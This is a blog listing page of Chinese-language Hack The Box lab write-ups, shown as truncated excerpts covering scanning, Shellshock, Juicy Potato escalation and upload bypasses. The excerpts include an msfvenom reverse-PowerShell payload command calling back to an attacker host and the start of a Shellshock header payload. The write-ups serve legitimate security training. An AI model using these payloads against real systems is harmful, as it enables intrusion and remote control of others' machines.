Hack The Box共26篇 第2页
node1 mongodb反弹shell-白鸢的笔记

node1 mongodb反弹shell

简介nodeDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.58  Linux 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.58 --min-rate 10000 -oA tartar22和30...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
08210
Chatterbox AChat System http服务攻击-白鸢的笔记

Chatterbox AChat System http服务攻击

简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
06510
Arctic  Juicy Potato提权-白鸢的笔记

Arctic Juicy Potato提权

拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
09310
Shocker cgi-bin目录shellshock-白鸢的笔记

Shocker cgi-bin目录shellshock

前提有cgi-bin  403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...
zhyann的头像-白鸢的笔记钻石会员zhyann11个月前
07810
Posion ssh端口转发 vnc连接-白鸢的笔记

Posion ssh端口转发 vnc连接

简介PosionDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.84  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.84有22、80端口 访问80端口在listfiles.p...
zhyann的头像-白鸢的笔记钻石会员zhyann11个月前
0669
Sunday  79端口finger服务用户枚举-白鸢的笔记

Sunday 79端口finger服务用户枚举

简介SundayDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.76 Solaris 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.76 --min-rate 10000 -oA Sunday发现一...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
0918
Irked  irc服务扫描-白鸢的笔记

Irked irc服务扫描

简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117  Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
0738
Bounty iis文件上传漏洞web.config绕过-白鸢的笔记

Bounty iis文件上传漏洞web.config绕过

简介SiloDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.93 Windows 1. 信息收集可以看到transfer.aspx 和 uploadedfiles  上google搜索iis exploithttps://xz.aliyu...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
0677
node2 ltrace使用 利用修改HOME环境变量bypass指定目录-白鸢的笔记

node2 ltrace使用 利用修改HOME环境变量bypass指定目录

权限提升到root现在我们有了tom的反弹shelltom是admin组的成员 可以运行 前提 看一下当时从网页上下载的文件中的app.js这里有一组命令使用方法且在这里看到想到这就是命令中的backup_key所以尝...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
0457
Conceal IKE服务枚举 IPSec服务连接 windows文件上传-白鸢的笔记

Conceal IKE服务枚举 IPSec服务连接 windows文件上传

简介ConcealDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.116 Windows 1. 信息收集扫描发现没有TCP服务尝试扫描UDP服务nmap -p 1-1000 -sU 10.10.10.116先尝试扫描...
zhyann的头像-白鸢的笔记钻石会员zhyann10个月前
0686